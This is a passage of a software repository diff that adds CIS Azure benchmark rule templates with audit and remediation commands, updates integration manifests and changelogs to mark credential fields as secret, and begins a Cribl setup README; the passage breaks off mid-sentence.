network ranges or VNET rules to allow access from specific virtual networks.", + "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Connection security`.\n4. Under `Firewall rules`, ensure `Allow access to Azure services` is set to `No`.\n\n**From Azure CLI**\n\nEnsure the output of the below command does not include a rule with the name AllowAllWindowsAzureIps or \"startIpAddress\": \"0.0.0.0\" & \"endIpAddress\": \"0.0.0.0\",\n```\naz postgres server firewall-rule list --resource-group --server \n```", + "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Connection security`.\n4. Under `Firewall rules`, set `Allow access to Azure services` to `No`.\n5. Click `Save`.\n\n**From Azure CLI**\n\nUse the below command to delete the AllowAllWindowsAzureIps rule for PostgreSQL Database.\n```\naz postgres server firewall-rule delete --name AllowAllWindowsAzureIps --resource-group --server-name \n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.7", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.7", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_7" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/ede1488a-e8cd-5d5f-a25d-96c136695594.json b/packages/cloud_security_posture/kibana/csp_rule_template/ede1488a-e8cd-5d5f-a25d-96c136695594.json new file mode 100644 index 00000000000..ab5c39f57a9 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/ede1488a-e8cd-5d5f-a25d-96c136695594.json @@ -0,0 +1,38 @@ +{ + "id": "ede1488a-e8cd-5d5f-a25d-96c136695594", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/rest/api/postgresql/configurations/listbyserver\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation\n4. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name", + "id": "ede1488a-e8cd-5d5f-a25d-96c136695594", + "name": "Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server", + "profile_applicability": "* Level 1", + "description": "Enable `log_connections` on `PostgreSQL Servers`.", + "rationale": "Enabling `log_connections` helps PostgreSQL Database to log attempted connection to the server, as well as successful completion of client authentication.\nLog data can be used to identify, troubleshoot, and repair configuration errors and suboptimal performance.", + "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_connections`.\n5. Ensure that value is set to `ON`.\n\n**From Azure CLI**\n\nEnsure `log_connections` value is set to `ON`\n```\naz postgres server configuration show --resource-group --server-name --name log_connections\n```\n\n**From PowerShell**\n\nEnsure `log_connections` value is set to `ON`\n\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_connections\n```", + "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_connections`.\n5. Click `ON` and save.\n\n**From Azure CLI**\n\nUse the below command to update `log_connections` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name log_connections --value on\n```\n\n**From PowerShell**\n\nUse the below command to update `log_connections` configuration.\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_connections -Value on\n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.3", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.3", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_3" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/f5f029ea-d16e-5661-bc66-3096aaeda2f3.json b/packages/cloud_security_posture/kibana/csp_rule_template/f5f029ea-d16e-5661-bc66-3096aaeda2f3.json new file mode 100644 index 00000000000..0a13404b10d --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/f5f029ea-d16e-5661-bc66-3096aaeda2f3.json @@ -0,0 +1,38 @@ +{ + "id": "f5f029ea-d16e-5661-bc66-3096aaeda2f3", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Secrets cannot be used beyond their assigned expiry date respectively. Secrets need to be rotated periodically wherever they are used.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/key-vault-whatis\n2. https://docs.microsoft.com/en-us/rest/api/keyvault/about-keys--secrets-and-certificates#key-vault-secrets\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-6-use-a-secure-key-management-process\n4. https://docs.microsoft.com/en-us/powershell/module/az.keyvault/set-azkeyvaultsecret?view=azps-7.4.0", + "id": "f5f029ea-d16e-5661-bc66-3096aaeda2f3", + "name": "Ensure that the Expiration Date is set for all Secrets in Non-RBAC Key Vaults", + "profile_applicability": "* Level 1", + "description": "Ensure that all Secrets in Non Role Based Access Control (RBAC) Azure Key Vaults have an expiration date set.", + "rationale": "The Azure Key Vault enables users to store and keep secrets within the Microsoft Azure environment.\nSecrets in the Azure Key Vault are octet sequences with a maximum size of 25k bytes each.\nThe `exp` (expiration date) attribute identifies the expiration date on or after which the secret MUST NOT be used.\nBy default, secrets never expire.\nIt is thus recommended to rotate secrets in the key vault and set an explicit expiration date for all secrets.\nThis ensures that the secrets cannot be used beyond their assigned lifetimes.", + "audit": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Secrets`.\n3. In the main pane, ensure that the status of the secret is `Enabled`.\n4. Set an appropriate `Expiration date` on all secrets.\n\n**From Azure CLI:**\n\nGet a list of all the key vaults in your Azure environment by running the following command:\n\n```\naz keyvault list\n```\n\nFor each key vault, ensure that the output of the below command contains ID (id), enabled status as `true` and Expiration date (expires) is not empty or null:\n\n```\naz keyvault secret list --vault-name --query '[*].{\"kid\":kid,\"enabled\":attributes.enabled,\"expires\":attributes.expires}'\n```\n\n**From PowerShell:**\n\nRetrieve a list of Key vaults:\n\n```\nGet-AzKeyVault\n```\n\nFor each Key vault run the following command to determine which vaults are configured to use RBAC:\n\n```\nGet-AzKeyVault -VaultName \n```\n\nFor each Key Vault with the `EnableRbacAuthorization` setting set to `False` or empty, run the following command.\n\n```\nGet-AzKeyVaultSecret -VaultName \n```\n\nMake sure the `Expires` setting is configured with a value as appropriate wherever the `Enabled` setting is set to `True`.", + "remediation": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Secrets`.\n3. In the main pane, ensure that the status of the secret is `Enabled`.\n4. Set an appropriate `Expiration date` on all secrets.\n\n**From Azure CLI:**\n\nUpdate the `Expiration date` for the secret using the below command:\n\n```\naz keyvault secret set-attributes --name --vault-name --expires Y-m-d'T'H:M:S'Z'\n```\n\nNote:\nTo view the expiration date on all secrets in a Key Vault using Microsoft API, the `List` Key permission is required.\n\nTo update the expiration date for the secrets:\n5. Go to Key vault, click on `Access policies`.\n6. Click on `Create` and add an access policy with the `Update` permission (in the Secret Permissions - Secret Management Operations section).\n\n**From PowerShell:**\n\nFor each Key vault with the `EnableRbacAuthorization` setting set to `False` or empty, run the following command.\n\n```\nSet-AzKeyVaultSecret -VaultName -Name -Expires \n```", + "section": "Key Vault", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 8.4", + "Key Vault" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "8.4", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_8_4" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/f6cfd4ce-1b96-5871-aa9d-8dba2d701579.json b/packages/cloud_security_posture/kibana/csp_rule_template/f6cfd4ce-1b96-5871-aa9d-8dba2d701579.json new file mode 100644 index 00000000000..160c46dbf35 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/f6cfd4ce-1b96-5871-aa9d-8dba2d701579.json @@ -0,0 +1,38 @@ +{ + "id": "f6cfd4ce-1b96-5871-aa9d-8dba2d701579", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Once TDE protector is encrypted with a Customer-managed key, it transfers entire responsibility of respective key management on to you, and hence you should be more careful about doing any operations on the particular key in order to keep data from corresponding SQL server and Databases hosted accessible.\n\nWhen deploying Customer Managed Keys, it is prudent to ensure that you also deploy an automated toolset for managing these keys (this should include discovery and key rotation), and Keys should be stored in an HSM or hardware backed keystore, such as Azure Key Vault.\n\nAs far as toolsets go, check with your cryptographic key provider, as they may well provide one as an add-on to their service.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/sql/relational-databases/security/encryption/transparent-data-encryption-byok-azure-sql\n2. https://azure.microsoft.com/en-in/blog/preview-sql-transparent-data-encryption-tde-with-bring-your-own-key-support/\n3. https://winterdom.com/2017/09/07/azure-sql-tde-protector-keyvault\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-5-use-customer-managed-key-option-in-data-at-rest-encryption-when-required\n5. https://docs.microsoft.com/en-us/azure/key-vault/general/basic-concepts\n6. https://docs.microsoft.com/en-us/cli/azure/sql/server/tde-key?view=azure-cli-latest\n7. https://learn.microsoft.com/en-us/powershell/module/az.sql/get-azsqlservertransparentdataencryptionprotector?view=azps-9.2.0\n8. https://learn.microsoft.com/en-us/powershell/module/az.sql/set-azsqlservertransparentdataencryptionprotector?view=azps-9.2.0", + "id": "f6cfd4ce-1b96-5871-aa9d-8dba2d701579", + "name": "Ensure SQL server's Transparent Data Encryption (TDE) protector is encrypted with Customer-managed key", + "profile_applicability": "* Level 2", + "description": "Transparent Data Encryption (TDE) with Customer-managed key support provides increased transparency and control over the TDE Protector, increased security with an HSM-backed external service, and promotion of separation of duties.\n\nWith TDE, data is encrypted at rest with a symmetric key (called the database encryption key) stored in the database or data warehouse distribution.\nTo protect this data encryption key (DEK) in the past, only a certificate that the Azure SQL Service managed could be used.\nNow, with Customer-managed key support for TDE, the DEK can be protected with an asymmetric key that is stored in the Azure Key Vault.\nThe Azure Key Vault is a highly available and scalable cloud-based key store which offers central key management, leverages FIPS 140-2 Level 2 validated hardware security modules (HSMs), and allows separation of management of keys and data for additional security.\n\nBased on business needs or criticality of data/databases hosted on a SQL server, it is recommended that the TDE protector is encrypted by a key that is managed by the data owner (Customer-managed key).", + "rationale": "Customer-managed key support for Transparent Data Encryption (TDE) allows user control of TDE encryption keys and restricts who can access them and when.\nAzure Key Vault, Azure\u2019s cloud-based external key management system, is the first key management service where TDE has integrated support for Customer-managed keys.\nWith Customer-managed key support, the database encryption key is protected by an asymmetric key stored in the Key Vault.\nThe asymmetric key is set at the server level and inherited by all databases under that server.", + "audit": "**From Azure Portal**\n\n1. Go to `SQL servers`\n\nFor the desired server instance\n\n2. Click On `Transparent data encryption`\n3. Ensure that `Customer-managed key` is selected\n4. Ensure `Make selected key the default TDE protector` is checked\n\n**From Azure CLI**\n\n```\naz account get-access-token --query \"{subscripton:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/encryptionProtector?api-version=2015-05-01-preview'\n```\n\nEnsure the output of the command contains properties\n\n`kind` set to `azurekeyvault`\n\n`serverKeyType` set to `AzureKeyVault`\n\n`uri` is not null\n\n**From PowerShell**\n\n```\nGet-AzSqlServerTransparentDataEncryptionProtector -ServerName -ResourceGroupName \n```\nEnsure the output of the command contains properties\n\n`Type` set to `AzureKeyVault`\n\n`ServerKeyVaultKeyName` set to `KeyVaultName_KeyName_KeyIdentifierVersion`\n\n`KeyId` set to `KeyIdentifier`", + "remediation": "**From Azure Console**\n\n1. Go to `SQL servers`\n\nFor the desired server instance\n\n2. Click On `Transparent data encryption`\n3. Set `Transparent data encryption` to `Customer-managed key`\n4. Browse through your `key vaults` to Select an existing key or create a new key in \nthe Azure Key Vault.\n5. Check `Make selected key the default TDE protector`\n\n**From Azure CLI**\n\nUse the below command to encrypt SQL server's TDE protector with a Customer-managed key\n```\naz sql server tde-key set --resource-group --server --server-key-type {AzureKeyVault} --kid \n```\n\n**From PowerShell**\n\nUse the below command to encrypt SQL server's TDE protector with a Customer-managed Key Vault key\n```\nSet-AzSqlServerTransparentDataEncryptionProtector -Type AzureKeyVault -KeyId -ServerName -ResourceGroupName \n```\nSelect `Y` when prompted", + "section": "SQL Server - Auditing", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.1.3", + "SQL Server - Auditing" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.1.3", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_1_3" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/fa9bbc09-3b1f-5344-a4a4-523a899a35b7.json b/packages/cloud_security_posture/kibana/csp_rule_template/fa9bbc09-3b1f-5344-a4a4-523a899a35b7.json new file mode 100644 index 00000000000..a278667f56e --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/fa9bbc09-3b1f-5344-a4a4-523a899a35b7.json @@ -0,0 +1,38 @@ +{ + "id": "fa9bbc09-3b1f-5344-a4a4-523a899a35b7", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Keys cannot be used beyond their assigned expiration dates respectively. Keys need to be rotated periodically wherever they are used.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/key-vault-whatis\n2. https://docs.microsoft.com/en-us/rest/api/keyvault/about-keys--secrets-and-certificates#key-vault-keys\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-6-use-a-secure-key-management-process\n4. https://docs.microsoft.com/en-us/powershell/module/az.keyvault/set-azkeyvaultkeyattribute?view=azps-0.10.0", + "id": "fa9bbc09-3b1f-5344-a4a4-523a899a35b7", + "name": "Ensure that the Expiration Date is set for all Keys in RBAC Key Vaults", + "profile_applicability": "* Level 1", + "description": "Ensure that all Keys in Role Based Access Control (RBAC) Azure Key Vaults have an expiration date set.", + "rationale": "Azure Key Vault enables users to store and use cryptographic keys within the Microsoft Azure environment.\nThe `exp` (expiration date) attribute identifies the expiration date on or after which the key MUST NOT be used for encryption of new data, wrapping of new keys, and signing.\nBy default, keys never expire.\nIt is thus recommended that keys be rotated in the key vault and set an explicit expiration date for all keys to help enforce the key rotation.\nThis ensures that the keys cannot be used beyond their assigned lifetimes.", + "audit": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Keys`.\n3. In the main pane, ensure that an appropriate `Expiration date` is set for any keys that are `Enabled`.\n\n**From Azure CLI:**\n\nGet a list of all the key vaults in your Azure environment by running the following command:\n\n```\naz keyvault list\n```\n\nThen for each key vault listed ensure that the output of the below command contains Key ID (kid), enabled status as `true` and Expiration date (expires) is not empty or null:\n\n```\naz keyvault key list --vault-name --query '[*].{\"kid\":kid,\"enabled\":attributes.enabled,\"expires\":attributes.expires}'\n```\n\n**From PowerShell:**\n\nRetrieve a list of Azure Key vaults:\n\n```\nGet-AzKeyVault\n```\n\nFor each Key vault run the following command to determine which vaults are configured to use RBAC.\n\n```\nGet-AzKeyVault -VaultName \n```\n\nFor each Key vault with the `EnableRbacAuthorizatoin` setting set to `True`, run the following command.\n\n```\nGet-AzKeyVaultKey -VaultName \n```\n\nMake sure the `Expires` setting is configured with a value as appropriate wherever the `Enabled` setting is set to `True`.", + "remediation": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Keys`.\n3. In the main pane, ensure that an appropriate `Expiration date` is set for any keys that are `Enabled`.\n\n**From Azure CLI:**\n\nUpdate the `Expiration date` for the key using the below command:\n\n```\naz keyvault key set-attributes --name --vault-name --expires Y-m-d'T'H:M:S'Z'\n```\n\n**Note:**\nTo view the expiration date on all keys in a Key Vault using Microsoft API, the \"List\" Key permission is required.\n\nTo update the expiration date for the keys:\n4. Go to the Key vault, click on Access Control (IAM).\n5. Click on Add role assignment and assign the role of Key Vault Crypto Officer to the appropriate user.\n\n**From PowerShell:**\n\n```\nSet-AzKeyVaultKeyAttribute -VaultName -Name -Expires \n```", + "section": "Key Vault", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 8.1", + "Key Vault" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "8.1", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_8_1" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/manifest.yml b/packages/cloud_security_posture/manifest.yml index 443ff0e4956..e2368444985 100644 --- a/packages/cloud_security_posture/manifest.yml +++ b/packages/cloud_security_posture/manifest.yml @@ -1,18 +1,17 @@ format_version: 3.0.0 name: cloud_security_posture title: "Security Posture Management" -version: "1.8.0-preview05" +version: "1.9.0-preview03" source: license: "Elastic-2.0" description: "Identify & remediate configuration risks in your Cloud infrastructure" type: integration categories: - - aws - - kubernetes - security + - cloudsecurity_cdr conditions: kibana: - version: "^8.13.0" + version: "^8.14.0" elastic: subscription: basic capabilities: @@ -116,7 +115,7 @@ policy_templates: show_user: false description: Template URL to Cloud Formation Quick Create Stack # ACCOUNT_TYPE value should be either "single-account" or "organization-account" - default: https://console.aws.amazon.com/cloudformation/home#/stacks/quickcreate?templateURL=https://elastic-cspm-cft.s3.eu-central-1.amazonaws.com/cloudformation-cspm-ACCOUNT_TYPE-8.12.0.yml&stackName=Elastic-Cloud-Security-Posture-Management¶m_EnrollmentToken=FLEET_ENROLLMENT_TOKEN¶m_FleetUrl=FLEET_URL¶m_ElasticAgentVersion=KIBANA_VERSION¶m_ElasticArtifactServer=https://artifacts.elastic.co/downloads/beats/elastic-agent + default: https://console.aws.amazon.com/cloudformation/home#/stacks/quickcreate?templateURL=https://elastic-cspm-cft.s3.eu-central-1.amazonaws.com/cloudformation-cspm-ACCOUNT_TYPE-8.13.0.yml&stackName=Elastic-Cloud-Security-Posture-Management¶m_EnrollmentToken=FLEET_ENROLLMENT_TOKEN¶m_FleetUrl=FLEET_URL¶m_ElasticAgentVersion=KIBANA_VERSION¶m_ElasticArtifactServer=https://artifacts.elastic.co/downloads/beats/elastic-agent - type: cloudbeat/cis_gcp title: GCP description: CIS Benchmark for Google Cloud Platform Foundations @@ -128,7 +127,7 @@ policy_templates: required: true show_user: false description: A URL to CloudShell for creating a new deployment - default: https://shell.cloud.google.com/cloudshell/?ephemeral=true&cloudshell_git_repo=https%3A%2F%2Fgithub.com%2Felastic%2Fcloudbeat&cloudshell_git_branch=8.12&cloudshell_workspace=deploy%2Fdeployment-manager&show=terminal + default: https://shell.cloud.google.com/cloudshell/?ephemeral=true&cloudshell_git_repo=https%3A%2F%2Fgithub.com%2Felastic%2Fcloudbeat&cloudshell_git_branch=8.13&cloudshell_workspace=deploy%2Fdeployment-manager&show=terminal - type: cloudbeat/cis_azure title: Azure description: CIS Benchmark for Microsoft Azure Foundations @@ -141,7 +140,7 @@ policy_templates: show_user: false description: A URL to the ARM Template for creating a new deployment # ACCOUNT_TYPE value should be either "single-account" or "organization-account" - default: https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2Felastic%2Fcloudbeat%2F8.12%2Fdeploy%2Fazure%2FARM-for-ACCOUNT_TYPE.json + default: https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2Felastic%2Fcloudbeat%2F8.13%2Fdeploy%2Fazure%2FARM-for-ACCOUNT_TYPE.json - name: vuln_mgmt title: Cloud Native Vulnerability Management (CNVM) description: Scan for cloud workload vulnerabilities @@ -177,7 +176,7 @@ policy_templates: required: true show_user: false description: Template URL to Cloud Formation Quick Create Stack - default: https://console.aws.amazon.com/cloudformation/home#/stacks/quickcreate?templateURL=https://elastic-cspm-cft.s3.eu-central-1.amazonaws.com/cloudformation-cnvm-8.12.0.yml&stackName=Elastic-Vulnerability-Management¶m_EnrollmentToken=FLEET_ENROLLMENT_TOKEN¶m_FleetUrl=FLEET_URL¶m_ElasticAgentVersion=KIBANA_VERSION¶m_ElasticArtifactServer=https://artifacts.elastic.co/downloads/beats/elastic-agent + default: https://console.aws.amazon.com/cloudformation/home#/stacks/quickcreate?templateURL=https://elastic-cspm-cft.s3.eu-central-1.amazonaws.com/cloudformation-cnvm-8.13.0.yml&stackName=Elastic-Vulnerability-Management¶m_EnrollmentToken=FLEET_ENROLLMENT_TOKEN¶m_FleetUrl=FLEET_URL¶m_ElasticAgentVersion=KIBANA_VERSION¶m_ElasticArtifactServer=https://artifacts.elastic.co/downloads/beats/elastic-agent owner: github: elastic/cloud-security-posture type: elastic diff --git a/packages/cloudflare/changelog.yml b/packages/cloudflare/changelog.yml index b40585d6cc7..ff28f5b7ecf 100644 --- a/packages/cloudflare/changelog.yml +++ b/packages/cloudflare/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.24.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "2.23.1" changes: - description: Changed owners diff --git a/packages/cloudflare/data_stream/audit/manifest.yml b/packages/cloudflare/data_stream/audit/manifest.yml index a8ac79b5d69..fcc2d38c84a 100644 --- a/packages/cloudflare/data_stream/audit/manifest.yml +++ b/packages/cloudflare/data_stream/audit/manifest.yml @@ -17,6 +17,7 @@ streams: multi: false required: true show_user: true + secret: true - name: account type: text title: Account ID diff --git a/packages/cloudflare/data_stream/logpull/manifest.yml b/packages/cloudflare/data_stream/logpull/manifest.yml index b437a086783..087f05751c4 100644 --- a/packages/cloudflare/data_stream/logpull/manifest.yml +++ b/packages/cloudflare/data_stream/logpull/manifest.yml @@ -17,6 +17,7 @@ streams: multi: false required: false show_user: true + secret: true - name: auth_token type: password title: Auth token @@ -24,6 +25,7 @@ streams: required: false multi: false show_user: true + secret: true - name: zone_id type: text title: Zone ID diff --git a/packages/cloudflare/manifest.yml b/packages/cloudflare/manifest.yml index 0d00c3e1aa6..5e5caeeabb0 100644 --- a/packages/cloudflare/manifest.yml +++ b/packages/cloudflare/manifest.yml @@ -1,13 +1,13 @@ name: cloudflare title: Cloudflare -version: "2.23.1" +version: "2.24.0" description: Collect logs from Cloudflare with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, network, cdn_security] conditions: kibana: - version: ^8.10.1 + version: ^8.12.0 icons: - src: /img/cf-logo-v.svg title: Cloudflare diff --git a/packages/cloudflare_logpush/changelog.yml b/packages/cloudflare_logpush/changelog.yml index 4b4fbc90337..ecd6d43be73 100644 --- a/packages/cloudflare_logpush/changelog.yml +++ b/packages/cloudflare_logpush/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.17.4" changes: - description: Changed owners diff --git a/packages/cloudflare_logpush/manifest.yml b/packages/cloudflare_logpush/manifest.yml index 36935e27b79..d808da82f4c 100644 --- a/packages/cloudflare_logpush/manifest.yml +++ b/packages/cloudflare_logpush/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cloudflare_logpush title: Cloudflare Logpush -version: "1.17.4" +version: "1.18.0" description: Collect and parse logs from Cloudflare API with Elastic Agent. type: integration categories: @@ -10,7 +10,7 @@ categories: - cdn_security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/cloudflare_logpush-overview1.png title: Cloudflare Logpush - Zero Trust Overview @@ -60,12 +60,14 @@ policy_templates: description: The header to check for a specific value specified by `secret.value`. required: false show_user: false + secret: false - name: secret_value type: password title: Secret Value description: The secret stored in the header name specified by `secret.header`. required: false show_user: false + secret: true - name: ssl type: yaml title: SSL Configuration @@ -137,6 +139,7 @@ policy_templates: required: false show_user: true description: First part of access key. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -144,13 +147,15 @@ policy_templates: required: false show_user: true description: Second part of access key. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File @@ -222,6 +227,7 @@ policy_templates: multi: false required: false show_user: true + secret: true - name: service_account_file type: text title: "JSON Credentials file path" diff --git a/packages/cockroachdb/changelog.yml b/packages/cockroachdb/changelog.yml index dd7b377e5dc..56e878dbebf 100644 --- a/packages/cockroachdb/changelog.yml +++ b/packages/cockroachdb/changelog.yml @@ -1,3 +1,18 @@ +- version: "1.9.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.8.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.8.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.7.1" changes: - description: Add dimension field for container.id which was previously missed during package-spec v3 migration diff --git a/packages/cockroachdb/data_stream/status/manifest.yml b/packages/cockroachdb/data_stream/status/manifest.yml index eaae20c3e71..b3aa554c9c4 100644 --- a/packages/cockroachdb/data_stream/status/manifest.yml +++ b/packages/cockroachdb/data_stream/status/manifest.yml @@ -21,6 +21,7 @@ streams: - name: bearer_token_file type: text title: Bearer Token File + secret: false multi: false required: false show_user: true @@ -53,6 +54,7 @@ streams: - name: password type: password title: Password + secret: true multi: false required: false show_user: true diff --git a/packages/cockroachdb/manifest.yml b/packages/cockroachdb/manifest.yml index a1e148f9555..a6860eba91b 100644 --- a/packages/cockroachdb/manifest.yml +++ b/packages/cockroachdb/manifest.yml @@ -1,6 +1,6 @@ name: cockroachdb title: CockroachDB Metrics -version: "1.7.1" +version: "1.9.0" description: Collect metrics from CockroachDB servers with Elastic Agent. type: integration icons: @@ -13,13 +13,13 @@ screenshots: title: CockroachDB metrics overview size: 5120x2562 type: image/png -format_version: "3.0.0" +format_version: "3.0.2" categories: - observability - datastore conditions: kibana: - version: "^8.9.0" + version: "^8.12.1" elastic: subscription: basic vars: diff --git a/packages/cribl/_dev/build/docs/README.md b/packages/cribl/_dev/build/docs/README.md new file mode 100644 index 00000000000..8963da8fddf --- /dev/null +++ b/packages/cribl/_dev/build/docs/README.md @@ -0,0 +1,43 @@ +# Cribl + +The Cribl integration offers users a way to ingest logs from either of Cribl's Elastic outputs into Elastic's Fleet integration data streams. This enables Cribl users to leverage the power of the Elastic Common Schema to unlock predefined dashboards, alerts and more. + +## Instructions + +1. Install the relevant integration assets in Kibana + + In order to make the most of your data, install Fleet integration assets to load index templates, ingest pipelines, and dashboards into Kibana. In Kibana, navigate to **Management** > **Integrations** in the sidebar. + + Find the relevant integration(s) by searching or browsing the catalog. For example, the Cisco ASA integration. + + ![Cisco ASA Integration](../img/catalog-cisco-asa.png) + + Navigate to the **Settings** tab and click **Install Cisco ASA assets**. Confirm by clicking **Install Cisco ASA** in the popup. + + ![Install Cisco ASA assets](../img/install-assets.png) + +2. Configuring the Cribl integration + + 1. Add informational field to Cribl Source + + Configure the Cribl Source to specify the source of the data in the `_dataId` field. + + ![Configure Cribl Source fields](../img/cribl-source-fields.png) + + See [Cribl Data Onboarding](https://docs.cribl.io/stream/data-onboarding/) for more information on configuring sources. + + 2. Configure the Cribl integration in Kibana + + Note: The Cribl integration does not require Elastic Agent, but a policy must be configured when setting up the Cribl integration. + +4. Configure an Elastic destination in Cribl + + Cribl offers two options for sending data to Elastic, the Elastic Cloud output for cloud environments, and the Elasticsearch output for self-managed. Consult [Cribl Elastic Cloud documentation](https://docs.cribl.io/stream/destinations-elastic-cloud/) or [Cribl Elasticsearch documentation](https://docs.cribl.io/stream/destinations-elastic/) for more details on how to configure. + + **Destination settings** + + 1. Set **Cloud Id** for the Cloud destination or **Bulk API URLs** for the Elasticsearch destination to point to your Elastic cluster. + + 2. Set **Index or Data Stream** to `logs-cribl-default`. + + 3. **API key** should be a Base64 encoded Elastic API key, which you can create in Kibana by following the instructions under **Management** > **Stack Management** > **Security** > **API Keys**. If you are using an API key with “Restrict 